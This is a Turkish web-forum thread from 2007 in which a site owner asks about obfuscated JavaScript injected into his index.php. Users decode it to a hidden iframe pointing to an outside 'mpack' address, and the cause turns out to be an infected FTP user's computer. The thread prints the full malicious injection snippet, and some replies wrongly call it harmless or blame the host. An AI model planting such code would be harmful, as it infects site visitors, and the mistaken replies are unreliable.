izinsiz kod yerleştirme

kGlz · 30/09/2007, 17:32

merhaba arkadaşlar
yapmış olduğum sitede ana sayfaya girdiğimde sadece beyaz bir sayfa ekrana geldi.daha sonra ftp programıyla index.php sayfasını bilgisayarıma indirdim.(daha önce 14kb olan php sayfam şimdi 1.4kb boyutundaydı.kodları açtığımda ise şöyle bir kodla karşşılaştım.

PHP Kodu:

  <script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script>

bu kodu arkadaşlar ben yazmadım ve bir korsan tarafından benim siteme atıldı zannedersem.bunun ne olduğu konusunda yardımcı olurmusunz?yani nedir bu. vede bir daha böyle birşeyle karşılaşmamam için ne yapmalıyım.

Teşekkürler.

selfblood · 30/09/2007, 19:24

Sayfaya yazdırılınca şöyle bir kod görünüyor.

Kod:

<iframe src="%5C%22http://81.95.150.82/mpack/index.php%5C%22" style="" height="0" width="0"></iframe>

Sanırım zararlı birşey değil. Adreste de "Apache 2 Test Page" olarak çıkıyor.

kGlz · 30/09/2007, 22:42

Alıntı:

selfblood, mesajından alıntı:

Sayfaya yazdırılınca şöyle bir kod görünüyor.

Kod:

<iframe src="%5C%22http://81.95.150.82/mpack/index.php%5C%22" style="" height="0" width="0"></iframe>

Sanırım zararlı birşey değil. Adreste de "Apache 2 Test Page" olarak çıkıyor.

bende avast antivirus var. vede trojen uyarısı veriyo. peki ama bu kodu index.php ye nasıl atıyo.bunu nasıl durdurabilirm.
Kolay gelsin.

ProJecT · 09/10/2007, 17:29

sanırım çalıştığın hosting şirketi bunu yapıyor , yani senin sayfanda zararlı birşeyler tespit ediyorsa karşı tarafından buından zarar görmemesi için bu kodu yazdırıyor . peki birşey sormak istiyorum ? bu index.php yerine index.htm , index.html yada default.asp yada daha değişik dosyalarda yazmışmı ?

kGlz · 10/10/2007, 12:46

Alıntı:

ProJecT, mesajından alıntı:

sanırım çalıştığın hosting şirketi bunu yapıyor , yani senin sayfanda zararlı birşeyler tespit ediyorsa karşı tarafından buından zarar görmemesi için bu kodu yazdırıyor . peki birşey sormak istiyorum ? bu index.php yerine index.htm , index.html yada default.asp yada daha değişik dosyalarda yazmışmı ?

hayır farklı bir dosya falan yazmamıştı.biz index.php yapınca bu kodu onun içine bu kodu atıyodu . biz index.html yapıncada aynı şekilde index.html içine bu kodu atıyodu. Ama sorunun kaynağını çözdük. bizim servere 2 tane kullnıcı ftp hesabıyla girebiliyodu.diğer arkaadşın bilgisayarında virüs varmış.o nedenle diğer arkadaşın bilgisaayrından ftp ye giriş yapınca index.php ye bu kodu o virüs atıyomuş.Arkadaş bilgisayarına format çekti. ve şu an için sorunu çözdük.

Kolay gelsin.

mastercollector · 14/10/2007, 03:42

bu bir internet wormu sanırsam. geçenlerde bir kişinin başına daha gelmişti. hosting firmasından kaynaklanan birşey. google da adresi aradım
http://www.google.com.tr/search?hl=t...btnG=Ara&meta=
yerli yabancı birçok kişi şikayet etmiş ama kesin bir bilgi yok.

30/09/2007, 17:32	#1 (permalink)
kGlz Ceviz Kıracağı Üyelik Tarihi: 06/2006 Yer: Kocaeli Mesaj: 314	izinsiz kod yerleştirme merhaba arkadaşlar yapmış olduğum sitede ana sayfaya girdiğimde sadece beyaz bir sayfa ekrana geldi.daha sonra ftp programıyla index.php sayfasını bilgisayarıma indirdim.(daha önce 14kb olan php sayfam şimdi 1.4kb boyutundaydı.kodları açtığımda ise şöyle bir kodla karşşılaştım. PHP Kodu: <script type="text/javascript" language="JavaScript"> eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%69%66%72%61%6D%65%20%73%72%63%3D%5C%22%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%35%30%2E%38%32%2F%6D%70%61%63%6B%2F%69%6E%64%65%78%2E%70%68%70%5C%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%73%74%79%6C%65%3D%5C%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%5C%22%3E%3C%2F%69%66%72%61%6D%65%3E%22%29%3B%0D%0A%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%22%20%22%3B"));</script> bu kodu arkadaşlar ben yazmadım ve bir korsan tarafından benim siteme atıldı zannedersem.bunun ne olduğu konusunda yardımcı olurmusunz?yani nedir bu. vede bir daha böyle birşeyle karşılaşmamam için ne yapmalıyım. Teşekkürler. __________________ http://www.kGlz.com

30/09/2007, 19:24	#2 (permalink)
selfblood Üye Üyelik Tarihi: 07/2006 Yer: İstanbul Mesaj: 143	Sayfaya yazdırılınca şöyle bir kod görünüyor. Kod: <iframe src="%5C%22http://81.95.150.82/mpack/index.php%5C%22" style="" height="0" width="0"></iframe> Sanırım zararlı birşey değil. Adreste de "Apache 2 Test Page" olarak çıkıyor. __________________ Flickr

Benzer Konular
Konu	Konuyu açana göre	Forum	Cevap	En Son Mesaj
adsl'e benden izinsiz....	dream box	Ağ / Güvenlik	14	02/01/2008 20:49
KPSS 2006 Yerleştirme Sonucu	kamilozcan__	Olumlu Sohbet	4	18/11/2006 14:25
gride edit yerleştirme	seyhan_82	C / C++	0	17/02/2005 23:45
Php : FormMail Img Yerleştirme	KaanK	PHP	0	06/12/2004 20:26
layer kullanmadan resim yerleştirme....	Gurhan	Web Tasarım	1	26/09/2003 22:38

09/10/2007, 17:29	#4 (permalink)
ProJecT 007 Üyelik Tarihi: 08/2005 Mesaj: 526	sanırım çalıştığın hosting şirketi bunu yapıyor , yani senin sayfanda zararlı birşeyler tespit ediyorsa karşı tarafından buından zarar görmemesi için bu kodu yazdırıyor . peki birşey sormak istiyorum ? bu index.php yerine index.htm , index.html yada default.asp yada daha değişik dosyalarda yazmışmı ?

14/10/2007, 03:42	#6 (permalink)
mastercollector Üye Üyelik Tarihi: 10/2007 Mesaj: 15	bu bir internet wormu sanırsam. geçenlerde bir kişinin başına daha gelmişti. hosting firmasından kaynaklanan birşey. google da adresi aradım http://www.google.com.tr/search?hl=t...btnG=Ara&meta= yerli yabancı birçok kişi şikayet etmiş ama kesin bir bilgi yok.

Seçenekler
Yazdırmaya Uygun Sayfa Sayfayı E-posta İle Gönder